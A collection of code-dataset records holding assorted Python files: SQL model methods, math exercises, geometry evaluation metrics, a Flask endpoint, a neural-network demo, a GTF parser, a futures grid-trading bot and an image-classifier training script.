app WHERE gh_id=%s and client_wx.client_id=client.id and client.app_id=app.id\"\n        r = db.execute(sql, gh_id)\n        obj = r.fetchone()\n        return obj\n\n    @classmethod\n    def get_wx_app(cls, db, appid):\n        sql = \"SELECT app.id as id, app.name as name FROM app, client, client_wx WHERE app.id=%s AND client.app_id=app.id AND client.id=client_wx.client_id\"\n        r = db.execute(sql, appid)\n        return r.fetchone()\n\n    @classmethod\n    def get_wx(cls, db, wx_appid):\n        sql = \"SELECT client_id, gh_id, wx_app_id, refresh_token, store_id, is_authorized FROM client_wx WHERE wx_app_id=%s\"\n        r = db.execute(sql, wx_appid)\n        return r.fetchone()\n\n    @classmethod\n    def get_wx_count(cls, db, store_id):\n        sql = \"SELECT count(client.id) as count FROM client_wx, client WHERE client_wx.client_id=client.id AND client_wx.store_id=%s\"\n        r = db.execute(sql, store_id)\n        obj = r.fetchone()\n        return obj['count']\n\n    @classmethod\n    def get_wx_page(cls, db, store_id, offset, limit):\n        sql = \"SELECT app.id as id, app.name as name, client_wx.gh_id as gh_id, client_wx.wx_app_id as wx_app_id, client_wx.store_id as store_id, client_wx.is_authorized as is_authorized FROM client_wx, client, app WHERE client_wx.client_id=client.id AND client_wx.store_id=%s AND client.app_id=app.id LIMIT %s, %s\"\n        r = db.execute(sql, (store_id, offset, limit))\n        return list(r.fetchall())\n\n    @classmethod\n    def get_store_id(cls, db, gh_id):\n        sql = \"SELECT store_id FROM client_wx WHERE client_wx.gh_id=%s\"\n        r = db.execute(sql, gh_id)\n        obj = r.fetchone()\n        if not obj:\n            return 0\n        return obj['store_id']\n\n\n    @classmethod\n    def set_wx_unauthorized(cls, db, wx_appid):\n        sql = \"UPDATE client_wx SET is_authorized=%s WHERE wx_app_id=%s\"\n        r = db.execute(sql, (0, wx_appid))\n        return r.rowcount\n\n    @classmethod\n    def set_wx_authorized(cls, db, wx_appid):\n        sql = \"UPDATE client_wx SET is_authorized=%s WHERE wx_app_id=%s\"\n        r = db.execute(sql, (1, wx_appid))\n        return r.rowcount\n\n    @classmethod\n    def update_wx(cls, db, wx_appid, refresh_token, is_authorized):\n        sql = \"UPDATE client_wx SET refresh_token=%s, is_authorized=%s WHERE wx_app_id=%s\"\n        is_auth = 1 if is_authorized else 0\n        r = db.execute(sql, (refresh_token, is_auth, wx_appid))\n        return r.rowcount\n","sub_path":"models/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"616165263","text":"import math\r\ndef findfactors(n):\r\n    f=[]\r\n    for i in range(1,int(math.sqrt(n)+1)):\r\n        if n%i==0:\r\n            if(n/i==i):\r\n                f=f+[i]\r\n            else:\r\n                f=f+[i]+[int(n/i)]\r\n    return f\r\nx=int(input(\"Enter number: \"))\r\nprint(\"factors of \",x,\": \",findfactors(x))\r\n","sub_path":"assignments/pythonpgms/factorsofNumber.py","file_name":"factorsofNumber.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"24444966","text":"import math\nd = 11\nstart = int((10**d)**(1.0/3))\nend = int((10**(d+1))**(1.0/3))\nseq = range(start, end)\n\nseq_cub = [a**3 for a in seq]\nseq_cub_digit = [''.join(sorted([b for b in str(a)])) for a in seq_cub]\n\nfrom collections import Counter\ncc = Counter(seq_cub_digit).most_common(10)\ndigit = cc[1][0]  # signature of the second most common permutation group\nprint([a for a, b in zip(seq_cub, seq_cub_digit) if b == digit])\n","sub_path":"python/Q62.py","file_name":"Q62.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
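The Q62.py record above stops at printing one arbitrary group of cube permutations; the usual way to finish this kind of search is to group cubes by their sorted-digit signature and keep only groups of the required size. A hedged sketch follows — the target group size of five is an assumption matching the classic Project Euler 62 statement, which the record never spells out.

from collections import defaultdict

groups = defaultdict(list)
for n in range(345, 10000):  # cube roots giving 8- to 12-digit cubes
    cube = n ** 3
    groups[''.join(sorted(str(cube)))].append(cube)

# smallest cube whose digit permutations yield exactly five cubes
candidates = [min(v) for v in groups.values() if len(v) == 5]
print(min(candidates) if candidates else 'no group of five in this range')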
{"seq_id":"431061","text":"import numpy as np\nimport os\n\n\ndef calcMops(true_positives, false_negatives, false_positives):\n    s = {\n        'recall': true_positives / (true_positives + false_negatives),\n        'precision': true_positives / (true_positives + false_positives),\n        'jaccardIndex': true_positives / (true_positives + false_negatives + false_positives),\n        'branchingFactor': false_positives / true_positives,\n        'missFactor': false_negatives / true_positives,\n    }\n    s['completeness'] = s['recall']\n    s['correctness'] = s['precision']\n    s['fscore'] = (2 * s['recall'] * s['precision']) / (s['recall'] + s['precision'])\n    return s\n\n\ndef run_threshold_geometry_metrics(refDSM, refDTM, refMask, testDSM, testDTM, testMask,\n                                   tform, ignoreMask):\n    refHgt = (refDSM - refDTM)\n    refObj = np.copy(refHgt)  # copy, so refHgt is not mutated below (mirrors testObj)\n    refObj[~refMask] = 0\n\n    testHgt = (testDSM - testDTM)\n    testObj = np.copy(testHgt)\n    testObj[~testMask] = 0\n\n    # Make metrics\n    refOnlyMask = refMask & ~testMask\n    testOnlyMask = testMask & ~refMask\n    overlapMask = refMask & testMask\n\n    # Apply ignore mask\n    refOnlyMask = refOnlyMask & ~ignoreMask\n    testOnlyMask = testOnlyMask & ~ignoreMask\n    overlapMask = overlapMask & ~ignoreMask\n\n    # Determine evaluation units.\n    unitArea = abs(tform[1] * tform[5])\n\n    # --- Hard Error 
------------------------------------------------------\n    # Regions that are 2D False Positives or False Negatives are\n    # all or nothing. These regions don't consider overlap in the\n    # underlying terrain models\n\n    # -------- False Positive ---------------------------------------------\n    unitCountFP = np.sum(testOnlyMask)\n    oobFP = np.sum(testOnlyMask * testObj) * unitArea\n\n    # -------- False Negative ---------------------------------------------\n    unitCountFN = np.sum(refOnlyMask)\n    oobFN = np.sum(refOnlyMask * refObj) * unitArea\n\n    # --- Soft Error ------------------------------------------------------\n    # Regions that are 2D True Positive\n\n    # For both below:\n    # Positive values are False Positives\n    # Negative values are False Negatives\n    deltaTop = testDSM - refDSM\n    deltaBot = refDTM - testDTM\n\n    # Regions that are 2D True Positives\n    unitCountTP = np.sum(overlapMask)\n    overlap = overlapMask * (testObj - refObj)\n    overlap[np.isnan(overlap)] = 0\n\n    # -------- False Positive -------------------------------------------------\n    false_positives = np.nansum((deltaTop > 0) * deltaTop * overlapMask) * unitArea + \\\n                      np.nansum((deltaBot > 0) * deltaBot * overlapMask) * unitArea\n\n    # -------- False Negative -------------------------------------------------\n    false_negatives = -np.nansum((deltaTop < 0) * deltaTop * overlapMask) * unitArea + \\\n                      -np.nansum((deltaBot < 0) * deltaBot * overlapMask) * unitArea\n\n    # -------- True Positive ---------------------------------------------------\n    true_positives = np.nansum(refObj * overlapMask) * unitArea - false_negatives\n    tolFP = false_positives + oobFP\n    tolFN = false_negatives + oobFN\n    tolTP = true_positives\n\n    metrics = {\n        '2D': calcMops(unitCountTP, unitCountFN, unitCountFP),\n        '3D': calcMops(tolTP, tolFN, tolFP),\n    }\n\n    return metrics\n","sub_path":"core3dmetrics/geometrics/threshold_geometry_metrics.py","file_name":"threshold_geometry_metrics.py","file_ext":"py","file_size_in_byte":3260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
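A tiny usage sketch for the calcMops helper defined in the record above, assuming it is in scope; the counts are toy numbers chosen only to make the arithmetic easy to check.

# 80 true positives, 20 false negatives, 10 false positives
scores = calcMops(80.0, 20.0, 10.0)
print(scores['recall'])        # 80 / (80 + 20)      = 0.8
print(scores['precision'])     # 80 / (80 + 10)      = 0.888...
print(scores['jaccardIndex'])  # 80 / (80 + 20 + 10) = 0.727...
print(scores['fscore'])        # harmonic mean       = 0.842...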
{"seq_id":"604468824","text":"#See the error message when a required argument is missing\n#罗旭阳, 2019/01/30\ndef pet(pet_name, animal_type = \"dog\"):\n\tprint(\"My pet name is \" + pet_name.title() + \".\" )\n\tprint(\"And it is a \" + animal_type + \".\")\n\n#positional parameter, plus a default-value argument\npet(\"alice\")\n\n#missing one required argument\n#pet()\n\n#keyword argument pairs\npet(animal_type = \"cat\", pet_name = \"jack\")\n","sub_path":"pet_function.py","file_name":"pet_function.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"172540757","text":"from flask import Flask, request, jsonify\r\nfrom flask_restful import Resource, Api, reqparse, abort\r\n\r\napp = Flask(__name__)\r\napi = Api(app)\r\n\r\n\r\n\r\n\"\"\"\r\nTest Code\r\nurl = 'curl -i -H \\\"Content-Type: application/json\\\" -X POST -d ' + '\\'' + total_request + '\\'' + ' http://127.0.0.1:5050/Test'\r\ncurl -i -H \"Content-Type: application/json\" -X POST -d '{\"Hello\":\"hi\"}' http://127.0.0.1:7070/MECrcaserver\r\nos.system(url)\r\n\"\"\"\r\n@app.route('/MECrcaserver',methods=['POST','PUT'])\r\ndef rca_server():\r\n    if not request.json:\r\n        abort(400)\r\n    data = request.json\r\n    print(data)\r\n    # api_handler.start_action(data['action'],data)\r\n    return ''\r\n\r\nif __name__ == '__main__':\r\n    app.run(host='192.168.11.11',port = 7071,debug = True)\r\n","sub_path":"rca_server.py","file_name":"rca_server.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"288245285","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndef forward (x,w1,b1,w2,b2):\r\n    z = 1/(1+np.exp(-x.dot(w1)-b1))\r\n    a = z.dot(w2) + b2\r\n    aexp = np.exp(a)\r\n    y = aexp/aexp.sum(axis=1, keepdims=True)\r\n    return y, z\r\n    \r\ndef classification_error(y,p):\r\n    # note: despite its name, this returns the classification *rate* (accuracy)\r\n    n_crct = 0 \r\n    n_total = 0\r\n    for i in range(len(y)):\r\n        n_total += 1\r\n        if y[i] == p[i]:\r\n            n_crct += 1\r\n    return float(n_crct)/ n_total\r\n\r\ndef cost(T, output):\r\n    t = T* np.log(output)\r\n    return t.sum()\r\n    \r\ndef derivative_w2(hidden, T, output):\r\n    re = hidden.T.dot(T - output)\r\n    return re\r\n    \r\ndef derivative_w1(x, hidden, T, output, w2):\r\n    dZ = (T - output).dot(w2.T) * hidden * (1 - hidden)\r\n    ret2 = x.T.dot(dZ)\r\n    return ret2\r\n    \r\ndef derivative_b2(T, output):\r\n    re = (T-output).sum(axis=0)\r\n    return re\r\n    \r\ndef derivative_b1(T, Y, W2, Z):\r\n    return ((T - Y).dot(W2.T) * Z * (1 - Z)).sum(axis=0)\r\n    \r\n    \r\n\r\ndef main():\r\n    N = 500\r\n    x1 = np.random.randn(N,2) + np.array([0,-2])\r\n    x2 = np.random.randn(N,2) + np.array([2,2])\r\n    x3 = np.random.randn(N,2) + np.array([-2,2])\r\n    x = np.vstack([x1, x2, x3])\r\n    \r\n    \r\n    D = 2#DIMENSIONS\r\n    M = 3#NO OF NEURONS IN HIDDEN LAYER\r\n    K = 3#NO OF CLASSES\r\n    \r\n    y = np.array([0]*N +[1]*N + [2]*N)\r\n    N = len(y)\r\n    T = np.zeros((N, K))\r\n    for i in range(N):\r\n        T[i, y[i]] = 1\r\n\r\n    plt.scatter(x[:,0], x[:,1], c=y, alpha=0.5)\r\n    plt.show()\r\n    \r\n\r\n    w1 = np.random.randn(D, M)\r\n    b1 = np.random.randn(M)\r\n    w2 = np.random.randn(M, K)\r\n    b2 = np.random.randn(K)\r\n\r\n    learning_rate = 10e-7\r\n    costs = []\r\n    for epoch in range(1000):\r\n        output, hidden = forward(x,w1,b1,w2,b2)\r\n        if epoch%500 == 0 :\r\n            c = cost(T, output)\r\n            P = np.argmax(output, axis =1)\r\n            r = classification_error(y, P)\r\n            print(\"cost:\", c, \"classification_rate:\", r)\r\n            costs.append(c)\r\n            print(w2.shape,derivative_w2(hidden, T, 
output).shape,T.shape,hidden.shape)\r\n \r\n w2 += learning_rate * derivative_w2(hidden, T, output)\r\n b2 += learning_rate * derivative_b2(T, output)\r\n w1 += learning_rate * derivative_w1(x, hidden, T, output, w2)\r\n b1 += learning_rate * derivative_b1(T, output, w2, hidden)\r\n\r\n plt.plot(costs)\r\n plt.show() \r\n \r\nif __name__=='__main__':\r\n main()","sub_path":"Deep_learning/backpropg.py","file_name":"backpropg.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"545678562","text":"from __future__ import annotations\n\nimport json\nfrom logging import Formatter, LogRecord\n\n\nclass JSONFormatter(Formatter):\n \"\"\"\n JSON log formatter\n\n Configuration::\n\n from tiger.logs import JSONFormatter\n\n handler = logging.StreamHandler(sys.stdout)\n handler.setFormatter(JSONFormatter())\n logger = logging.getLogger('tiger')\n logger.setLevel(logging.DEBUG)\n logger.addHandler(handler)\n\n Usage::\n\n logger.info('Connection established')\n logger.error('Could not connect to server', exc_info=True)\n\n Output::\n\n {\n \"tag\": \"tiger\",\n \"level\": \"INFO\",\n \"created\": 1551819415.017764,\n \"message\": \"Connection established\"\n }\n\n {\n \"tag\": \"tiger\",\n \"level\": \"ERROR\",\n \"created\": 1551819292.640645,\n \"message\": \"Could not connect to server\",\n \"exception\": \"Traceback (most recent call last): ... Connection refused by the server\"\n }\n \"\"\"\n\n def format(self, record: LogRecord) -> str:\n json_record = {\n \"tag\": record.name,\n \"level\": record.levelname,\n \"created\": record.created,\n \"message\": record.getMessage(),\n }\n\n if record.exc_info:\n json_record[\"exception\"] = self.formatException(record.exc_info)\n\n return json.dumps(json_record, ensure_ascii=False)\n","sub_path":"tiger/logging/formatter.py","file_name":"formatter.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"474656480","text":"import pandas\n\nfrom . 
import feature\n\nSOURCE = \"transcript_utils\"\nMISSING_VALUE = \".\"\n\n\nclass GtfRow(object):\n SEQNAME_COL = 0\n FEATURE_COL = 2\n START_COL = 3\n END_COL = 4\n STRAND_COL = 6\n ATTRIBUTES_COL = 8\n\n EXON_FEATURE = \"exon\"\n\n GENE_ID_ATTRIBUTE = \"gene_id\"\n TRANSCRIPT_ID_ATTRIBUTE = \"transcript_id\"\n\n @classmethod\n def from_file(cls, row_data):\n strip_quotes = lambda x: x.replace('\"', '')\n attr_str = row_data[GtfRow.ATTRIBUTES_COL]\n attr_dict = {attr: strip_quotes(val) for attr, val in\n [av.split(\" \", 1) for av in attr_str.split(\"; \")]}\n\n return GtfRow(row_data, attr_dict)\n\n @classmethod\n def from_values(cls, seqname, feature_type, start, end,\n strand, gene, transcript):\n\n row_data = [seqname, SOURCE, feature_type, start, end,\n MISSING_VALUE, strand, MISSING_VALUE]\n attr_dict = {GtfRow.GENE_ID_ATTRIBUTE: gene,\n GtfRow.TRANSCRIPT_ID_ATTRIBUTE: transcript}\n\n return GtfRow(row_data, attr_dict)\n\n def __init__(self, row_data, attr_dict):\n self.row_data = row_data\n self.attr_dict = attr_dict\n\n def get_seqname(self):\n return self.row_data[GtfRow.SEQNAME_COL]\n\n def get_feature(self):\n return self.row_data[GtfRow.FEATURE_COL]\n\n def get_start(self):\n return self.row_data[GtfRow.START_COL]\n\n def get_end(self):\n return self.row_data[GtfRow.END_COL]\n\n def get_strand(self):\n return self.row_data[GtfRow.STRAND_COL]\n\n def get_gene(self):\n return self.attr_dict[GtfRow.GENE_ID_ATTRIBUTE]\n\n def get_transcript(self):\n return self.attr_dict[GtfRow.TRANSCRIPT_ID_ATTRIBUTE]\n\n def is_exon(self):\n return self.get_feature() == GtfRow.EXON_FEATURE\n\n def __str__(self):\n fields = list(self.row_data)\n\n attr_str = \"; \".join([\"{k} \\\"{v}\\\"\".format(k=k, v=v)\n for k, v in iter(self.attr_dict.items())])\n\n fields.append(attr_str)\n\n return \"\\t\".join([str(field) for field in fields])\n\n\nclass GtfInfo(object):\n def __init__(self, gtf_file, logger):\n self.gtf_file = gtf_file\n self.data = pandas.read_csv(\n gtf_file, sep=\"\\t\", header=None, comment=\"#\")\n self.logger = logger\n\n def rows(self):\n for index, row in self.data.iterrows():\n yield GtfRow.from_file(row)\n\n def get_transcript_info(self):\n self.logger.info(\"Reading transcript info...\")\n\n transcript_info = {}\n lines_processed = 0\n\n for row in self.rows():\n lines_processed += 1\n if lines_processed % 10000 == 0:\n self.logger.debug(\"Processed {l} GTF lines.\".format(l=lines_processed))\n\n if not row.is_exon():\n continue\n\n gene_name = row.get_gene()\n\n gene = None\n if gene_name in transcript_info:\n gene = transcript_info[gene_name]\n else:\n gene = feature.Gene(row)\n transcript_info[gene_name] = gene\n\n transcript = gene.add_transcript(row)\n transcript.add_exon(row)\n\n self.logger.info(\"...read transcript information for {g} genes\".format(\n g=len(transcript_info)))\n\n return transcript_info\n","sub_path":"transcript_utils/gtf.py","file_name":"gtf.py","file_ext":"py","file_size_in_byte":3351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"503945077","text":"'''backtest\nstart: 2020-02-22 00:00:00\nend: 2020-04-06 00:00:00\nperiod: 1h\nexchanges: [{\"eid\":\"Futures_OKCoin\",\"currency\":\"BTC_USD\"}]\n'''\nimport sys\nimport pandas as pd\nimport datetime\n# from fmz import *\n# task = VCtx(__doc__)\n\ninit_counter = exchange.GetPosition()[0]\nmax_price = 7000\nmin_price = 6000\nmid_price = min_price + (max_price - min_price)/2\nnet_sum = 40\nnet_price = ((max_price - 
min_price)/2)/net_sum\nnet_position = (init_counter * 3) / (100 * net_sum)\nif (max_price - min_price)/min_price > 0.2:\n print(\"[-- 价格区间设置错误,区间差价大于20% --]\")\n sys.exit(0)\n\nclass Exchange:\n # 交易回测引擎\n def __init__(self, trade_symbols, leverage=20, commission=0.00005, initial_balance=10000, log=False):\n self.initial_balance = initial_balance # 初始的资产\n self.commission = commission\n self.leverage = leverage\n self.trade_symbols = trade_symbols\n self.date = ''\n self.log = log\n self.df = pd.DataFrame(columns=['margin', 'total', 'leverage', 'realised_profit', 'unrealised_profit'])\n self.account = {'USDT': {'realised_profit': 0, 'margin': 0, 'unrealised_profit': 0, 'total': initial_balance,\n 'leverage': 0}}\n for symbol in trade_symbols:\n self.account[symbol] = {'amount': 0, 'hold_price': 0, 'value': 0, 'price': 0, 'realised_profit': 0,\n 'margin': 0, 'unrealised_profit': 0}\n\n def Trade(self, symbol, direction, price, amount, msg=''):\n if self.date and self.log:\n print('%-20s%-5s%-5s%-10.8s%-8.6s %s' % (\n str(self.date), symbol, 'buy' if direction == 1 else 'sell', price, amount, msg))\n\n cover_amount = 0 if direction * self.account[symbol]['amount'] >= 0 else min(\n abs(self.account[symbol]['amount']), amount)\n open_amount = amount - cover_amount\n\n self.account['USDT']['realised_profit'] -= price * amount * self.commission # 扣除手续费\n\n if cover_amount > 0: # 先平仓\n self.account['USDT']['realised_profit'] += -direction * (\n price - self.account[symbol]['hold_price']) * cover_amount # 利润\n self.account['USDT']['margin'] -= cover_amount * self.account[symbol]['hold_price'] / self.leverage # 释放保证金\n\n self.account[symbol]['realised_profit'] += -direction * (\n price - self.account[symbol]['hold_price']) * cover_amount\n self.account[symbol]['amount'] -= -direction * cover_amount\n self.account[symbol]['margin'] -= cover_amount * self.account[symbol]['hold_price'] / self.leverage\n self.account[symbol]['hold_price'] = 0 if self.account[symbol]['amount'] == 0 else self.account[symbol][\n 'hold_price']\n\n if open_amount > 0:\n total_cost = self.account[symbol]['hold_price'] * direction * self.account[symbol][\n 'amount'] + price * open_amount\n total_amount = direction * self.account[symbol]['amount'] + open_amount\n\n self.account['USDT']['margin'] += open_amount * price / self.leverage\n self.account[symbol]['hold_price'] = total_cost / total_amount\n self.account[symbol]['amount'] += direction * open_amount\n self.account[symbol]['margin'] += open_amount * price / self.leverage\n\n self.account[symbol]['unrealised_profit'] = (price - self.account[symbol]['hold_price']) * self.account[symbol][\n 'amount']\n self.account[symbol]['price'] = price\n self.account[symbol]['value'] = abs(self.account[symbol]['amount']) * price\n\n return True\n\n def Buy(self, symbol, price, amount, msg=''):\n self.Trade(symbol, 1, price, amount, msg)\n\n def Sell(self, symbol, price, amount, msg=''):\n self.Trade(symbol, -1, price, amount, msg)\n\n def Update(self, date, close_price): # 对资产进行更新\n self.date = date\n self.close = close_price\n self.account['USDT']['unrealised_profit'] = 0\n for symbol in self.trade_symbols:\n if np.isnan(close_price[symbol]):\n continue\n self.account[symbol]['unrealised_profit'] = (close_price[symbol] - self.account[symbol]['hold_price']) * \\\n self.account[symbol]['amount']\n self.account[symbol]['price'] = close_price[symbol]\n self.account[symbol]['value'] = abs(self.account[symbol]['amount']) * close_price[symbol]\n self.account['USDT']['unrealised_profit'] += 
self.account[symbol]['unrealised_profit']\n if self.date.hour in [0, 8, 16]:\n pass\n self.account['USDT']['realised_profit'] += -self.account[symbol]['amount'] * close_price[\n symbol] * 0.01 / 100\n\n self.account['USDT']['total'] = round(\n self.account['USDT']['realised_profit'] + self.initial_balance + self.account['USDT']['unrealised_profit'],\n 6)\n self.account['USDT']['leverage'] = round(self.account['USDT']['margin'] / self.account['USDT']['total'],\n 4) * self.leverage\n self.df.loc[self.date] = [self.account['USDT']['margin'], self.account['USDT']['total'],\n self.account['USDT']['leverage'], self.account['USDT']['realised_profit'],\n self.account['USDT']['unrealised_profit']]\n\nclass StopPolicy(object):\n # 止盈止损策略\n def __init__(self):\n pass\n\n def stop_loss(self):\n pass\n\n def stop_profit(self):\n pass\n\nkongtou_trade_list = []\nduotou_trade_list = []\nwhile True:\n ticker = exchange.GetTicker()\n price = ticker['Last']\n if (price >= mid_price) and (price < max_price): # 空头\n if len(kongtou_trade_list) > 0:\n last_trade = kongtou_trade_list[-1]\n if price - last_trade['open_price'] >= net_price: # 开空\n exchange.SetDirection(\"sell\")\n exchange.Sell(price - 10, net_position)\n Log(\"[== 开空头仓 ==]: 开仓价格:{} 网格id:{}\".format((price+0.2), len(kongtou_trade_list)))\n kongtou_trade_list.append({\"open_price: \": (price + 0.2),\n \"net_id: \": len(kongtou_trade_list),\n \"direction: \": \"kong\"})\n if last_trade['open_price'] - price > net_price: # 平空\n exchange.SetDirection(\"closesell\")\n exchange.Buy((price+0.2), net_position)\n Log(\"[== 平空头仓 ==]:平仓价格:{} 网格id:{}\".format((price+0.2), len(kongtou_trade_list)))\n del kongtou_trade_list[-1]\n if len(kongtou_trade_list) == 0:\n if (price - mid_price) > net_price:\n exchange.SetDirection(\"sell\")\n exchange.Sell(price - 0.2, net_position)\n Log(\"[== 开空头仓 ==]: 开仓价格:{} 网格id:{}\".format((price-0.2), len(kongtou_trade_list)))\n\n if (price < mid_price) and (price > min_price): # 多头\n if len(duotou_trade_list) > 0:\n last_trade = duotou_trade_list[-1]\n if last_trade['open_price'] - price >= net_price: # 开多\n exchange.SetDirection(\"buy\")\n exchange.Buy(price+0.2, net_position)\n Log(\"[== 开多头仓 ==]: 开仓价格:{} 网格id:{}\".format((price+0.2), len(duotou_trade_list)))\n duotou_trade_list.append({\"open_price: \": (price + 0.2),\n \"net_id: \": len(duotou_trade_list),\n \"direction: \": \"duo\"})\n if price - last_trade['open_price'] > net_price: # 平多\n exchange.SetDirection(\"closebuy\")\n exchange.Sell(price-0.2, net_position)\n Log(\"[== 平多头仓 ==]:平仓价格:{} 网格id:{}\".format((price-0.2), len(duotou_trade_list)))\n del duotou_trade_list[-1]\n if len(duotou_trade_list) == 0:\n if (mid_price - price) > net_price:\n exchange.SetDirection(\"buy\")\n exchange.Buy(price+0.2, net_position)\n Log(\"[== 开多头仓 ==]: 开仓价格:{} 网格id:{}\".format((price+0.2), len(duotou_trade_list)))\n\n if (price > max_price) or (price < min_price):\n Log(\"[-- 价格已经突破了区间,所有仓位都将平掉。程序也将退出 --]\")\n if len(kongtou_trade_list) > 0:\n exchange.SetDirection(\"closesell\")\n exchange.Buy((price + 10), net_position*len(kongtou_trade_list))\n if len(duotou_trade_list) > 0:\n exchange.SetDirection(\"closebuy\")\n exchange.Sell(price - 10, net_position*len(duotou_trade_list))\n sys.exit(0)\n Sleep(1000*3)","sub_path":"Easy_net.py","file_name":"Easy_net.py","file_ext":"py","file_size_in_byte":8968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"46207091","text":"# Import Libraries\nimport torch\nimport torchvision.transforms as 
transforms\nimport torchvision.datasets as datasets\nimport torchvision.models as models\nimport torch.nn as nn\nimport torch.optim as optim\nimport numpy as np\nfrom PIL import Image\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\n\n# Specify transforms using torchvision.transforms as transforms library\ntransformations = transforms.Compose([\n transforms.Resize(255),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n])\n\n# Load in each dataset and apply transformations using the torchvision.datasets as datasets library\ntrain_set = datasets.ImageFolder(\"RDDC_Train\", transform=transformations)\nval_set = datasets.ImageFolder(\"RDDC_Test\", transform=transformations)\n\nprint('The class labels are:', train_set.classes, '\\n')\n\n# Put into a Dataloader using torch library\nbatch_size = 32\ntrain_loader = torch.utils.data.DataLoader(train_set, batch_size=batch_size, shuffle=True)\nval_loader = torch.utils.data.DataLoader(val_set, batch_size=batch_size, shuffle=True)\n\n# Get pretrained model using torchvision.models as models library\nmodel = models.densenet161(pretrained=True)\n\n# Turn off training for their parameters\nfor param in model.parameters():\n param.requires_grad = False\n\n# Create new classifier for model using torch.nn as nn library\nclassifier_input = model.classifier.in_features\nnum_labels = 8\nclassifier = nn.Sequential(nn.Linear(classifier_input, 64),\n nn.ReLU(),\n nn.Linear(64, 32),\n nn.ReLU(),\n nn.Linear(32, num_labels),\n nn.LogSoftmax(dim=1))\n\n# Replace default classifier with new classifier\nmodel.classifier = classifier\n\n# Find the device available to use using torch library\nif torch.cuda.is_available():\n device = 'cuda'\nelse:\n device = 'cpu'\n\n# Move model to the device specified above\nmodel.to(device)\n\n# Set the error function using torch.nn as nn library\ncriterion = nn.NLLLoss()\n# Set the optimizer function using torch.optim as optim library\noptimizer = optim.Adam(model.classifier.parameters())\n\n# Training the Model\nepochs = 50\nstart_train = time.time()\nepoch_array = []\naccu_array = []\nD00_TPR_array = []\nD00_FPR_array = []\nD01_TPR_array = []\nD01_FPR_array = []\nD10_TPR_array = []\nD10_FPR_array = []\nD11_TPR_array = []\nD11_FPR_array = []\nD20_TPR_array = []\nD20_FPR_array = []\nD40_TPR_array = []\nD40_FPR_array = []\nD43_TPR_array = []\nD43_FPR_array = []\nD44_TPR_array = []\nD44_FPR_array = []\nD00_TPR_array.append(0)\nD00_FPR_array.append(0)\nD01_TPR_array.append(0)\nD01_FPR_array.append(0)\nD10_TPR_array.append(0)\nD10_FPR_array.append(0)\nD11_TPR_array.append(0)\nD11_FPR_array.append(0)\nD20_TPR_array.append(0)\nD20_FPR_array.append(0)\nD40_TPR_array.append(0)\nD40_FPR_array.append(0)\nD43_TPR_array.append(0)\nD43_FPR_array.append(0)\nD44_TPR_array.append(0)\nD44_FPR_array.append(0)\n\nfor epoch in range(epochs):\n display_epoch = epoch + 1\n print('Epoch:', display_epoch)\n epoch_array.append(display_epoch)\n train_loss = 0\n val_loss = 0\n accuracy = 0\n\n # Training the model\n model.train()\n counter = 0\n for inputs, labels in train_loader:\n # Move to device\n inputs, labels = inputs.to(device), labels.to(device)\n # Clear optimizers\n optimizer.zero_grad()\n # Forward pass\n output = model.forward(inputs)\n # Loss\n loss = criterion(output, labels)\n # Calculate gradients (backpropogation)\n loss.backward()\n # Adjust parameters based on gradients\n optimizer.step()\n # Add the loss to the training set's rnning loss\n 
train_loss += loss.item() * inputs.size(0)\n\n # Print the progress of our training\n counter += 1\n print(\"Batch:\", counter, \"out of\", len(train_loader))\n\n end_train = time.time()\n print('Finished Epoch', epoch + 1, 'Training in %0.2f minutes' % ((end_train - start_train) / 60))\n\n # Evaluating the model\n start_valid = time.time()\n model.eval()\n counter = 0\n\n total_classes = 8\n output = torch.randn(batch_size, total_classes) # refer to output after softmax\n target = torch.randint(0, total_classes, (batch_size,)) # labels\n confusion_matrix = torch.zeros(total_classes, total_classes)\n\n # Tell torch not to calculate gradients\n with torch.no_grad():\n for inputs, labels in val_loader:\n # Move to device\n inputs, labels = inputs.to(device), labels.to(device)\n # Forward pass\n output = model.forward(inputs)\n # Calculate Loss\n valloss = criterion(output, labels)\n # Add loss to the validation set's running loss\n val_loss += valloss.item() * inputs.size(0)\n\n # Since our model outputs a LogSoftmax, find the real\n # percentages by reversing the log function\n output = torch.exp(output)\n # Get the top class of the output\n top_p, top_class = output.topk(1, dim=1)\n # See how many of the classes were correct?\n equals = top_class == labels.view(*top_class.shape)\n # Calculate the mean (get the accuracy for this batch)\n # and add it to the running accuracy for this epoch\n accuracy += torch.mean(equals.type(torch.FloatTensor)).item()\n # Print the progress of our evaluation\n counter += 1\n print(\"Batch:\", counter, \"out of\", len(val_loader))\n\n _, preds = torch.max(output, 1)\n\n for p, t in zip(preds.view(-1), labels.view(-1)):\n confusion_matrix[p.long(), t.long()] += 1\n\n print(confusion_matrix)\n\n TP = confusion_matrix.diag()\n\n for c in range(total_classes):\n idx = torch.ones(total_classes).byte()\n idx[c] = 0\n TN = confusion_matrix[idx.nonzero()[:, None], idx.nonzero()].sum()\n FP = confusion_matrix[c, idx].sum()\n FN = confusion_matrix[idx, c].sum()\n\n sensitivity = (TP[c] / (TP[c] + FN))\n 